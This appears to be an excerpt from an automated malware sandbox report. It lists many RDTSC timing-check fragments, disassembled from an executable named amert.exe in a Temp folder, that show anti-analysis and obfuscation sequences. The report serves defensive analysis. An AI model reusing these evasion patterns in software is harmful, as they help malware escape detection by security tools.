0x0000004a clc 0x0000004b push FFFFFFFFh 0x0000004d mov bx, 16F6h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F0D7471B5DBh 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83F75E second address: 83F764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 842591 second address: 842597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83D724 second address: 83D728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 842597 second address: 8425F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F0D7471B5D8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F0D7471B5D8h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 mov ebx, 746D7CF6h 0x00000046 push 00000000h 0x00000048 mov edi, dword ptr [ebp+1244E01Ch] 0x0000004e xchg eax, esi 0x0000004f push ecx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 841812 second address: 841817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 841817 second address: 841821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0D7471B5D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 841821 second address: 841825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8427C7 second address: 8427EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0D7471B5E4h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F0D7471B5DCh 0x00000014 jnl 00007F0D7471B5D6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8427EF second address: 8427F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 84386F second address: 843873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 84A4DC second address: 84A4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 84D3AD second address: 84D3C1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D7471B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0D7471B5DAh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 84D6D3 second address: 84D6E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 84D858 second address: 84D85C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 84D85C second address: 84D87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D755569BCh 0x0000000d jmp 00007F0D755569BCh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 84D87C second address: 84D880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 810B05 second address: 810B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569BDh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007F0D755569B6h 0x00000015 pop eax 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8569B9 second address: 8569BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8569BF second address: 8569C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0D755569B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85764E second address: 85766A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F0D7471B5E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85CFA4 second address: 85CFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0D755569B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D110 second address: 85D12E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D12E second address: 85D132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D256 second address: 85D25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D25C second address: 85D260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D260 second address: 85D26B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D26B second address: 85D271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D271 second address: 85D286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F0D7471B5D6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D286 second address: 85D290 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D755569B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D290 second address: 85D2A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D2A0 second address: 85D2A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D3C7 second address: 85D3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D3CD second address: 85D3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 85D3D7 second address: 85D3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 811628 second address: 81164F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569BFh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F0D755569C2h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8618AC second address: 8618B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8265AD second address: 8265B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8265B1 second address: 810B27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F0D7471B5D8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 xor dx, 0FCDh 0x0000002a call 00007F0D7471B5DDh 0x0000002f sub dword ptr [ebp+122D1BECh], eax 0x00000035 pop edx 0x00000036 call dword ptr [ebp+122D27D7h] 0x0000003c jnl 00007F0D7471B5EBh 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 pushad 0x00000046 popad 0x00000047 je 00007F0D7471B5D6h 0x0000004d pop eax 0x0000004e push edi 0x0000004f pushad 0x00000050 popad 0x00000051 pop edi 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82668A second address: 82668E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 826A6E second address: 826A78 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D7471B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 826A78 second address: 826A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 826A7E second address: 826A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 826B78 second address: 826B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 826F7B second address: 826F80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 826F80 second address: 826F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0D755569BCh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827078 second address: 8270D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0D7471B5D6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jg 00007F0D7471B5DCh 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F0D7471B5D8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 jmp 00007F0D7471B5E4h 0x00000036 mov edx, dword ptr [ebp+122D3C7Bh] 0x0000003c push eax 0x0000003d push edi 0x0000003e push edi 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82744A second address: 82745C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D755569B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82777C second address: 82779C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0D7471B5DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D7471B5DAh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82779C second address: 8277A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8277A1 second address: 8277A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82785F second address: 827919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0D755569BEh 0x0000000a popad 0x0000000b push eax 0x0000000c jnc 00007F0D755569D8h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F0D755569B8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d jmp 00007F0D755569C8h 0x00000032 mov cx, 4B59h 0x00000036 lea eax, dword ptr [ebp+1247B356h] 0x0000003c jmp 00007F0D755569C8h 0x00000041 sub ecx, dword ptr [ebp+122D28AEh] 0x00000047 nop 0x00000048 jmp 00007F0D755569BEh 0x0000004d push eax 0x0000004e jp 00007F0D755569BEh 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827919 second address: 827962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F0D7471B5D8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 0000001Ch 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 jmp 00007F0D7471B5DCh 0x00000025 lea eax, dword ptr [ebp+1247B312h] 0x0000002b movsx ecx, ax 0x0000002e push eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 jno 00007F0D7471B5D6h 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827962 second address: 827966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827966 second address: 82796F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82796F second address: 827975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827975 second address: 811628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D3B47h] 0x0000000f mov edx, ebx 0x00000011 call dword ptr [ebp+122D59A4h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jmp 00007F0D7471B5DCh 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 861DD8 second address: 861DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8620AE second address: 8620C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F0D7471B5DEh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8620C6 second address: 8620CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8620CC second address: 8620E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D7471B5E6h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8620E6 second address: 8620EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86B312 second address: 86B338 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0D7471B5E6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F0D7471B5D6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A181 second address: 86A186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A2D3 second address: 86A2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D7471B5E9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A2F0 second address: 86A310 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F0D755569C5h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A310 second address: 86A316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A450 second address: 86A458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A458 second address: 86A46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D7471B5D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F0D7471B5D6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A46D second address: 86A47F instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D755569B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F0D755569B6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A47F second address: 86A485 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86AB30 second address: 86AB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 871264 second address: 8712B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F0D7471B5DFh 0x0000000f jmp 00007F0D7471B5E4h 0x00000014 jmp 00007F0D7471B5E3h 0x00000019 popad 0x0000001a jnp 00007F0D7471B610h 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 874421 second address: 874425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 874425 second address: 87443F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F0D75558556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F0D75558556h 0x00000013 ja 00007F0D75558556h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87443F second address: 874453 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F0D755569D6h 0x00000009 jbe 00007F0D755569D6h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 874453 second address: 874457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 874457 second address: 87445D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87445D second address: 874469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 873CC7 second address: 873CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E8h 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87955F second address: 879575 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007F0D75558556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 js 00007F0D75558556h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879575 second address: 879579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879579 second address: 879581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879581 second address: 87958B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0D755569D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87958B second address: 879595 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D75558556h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
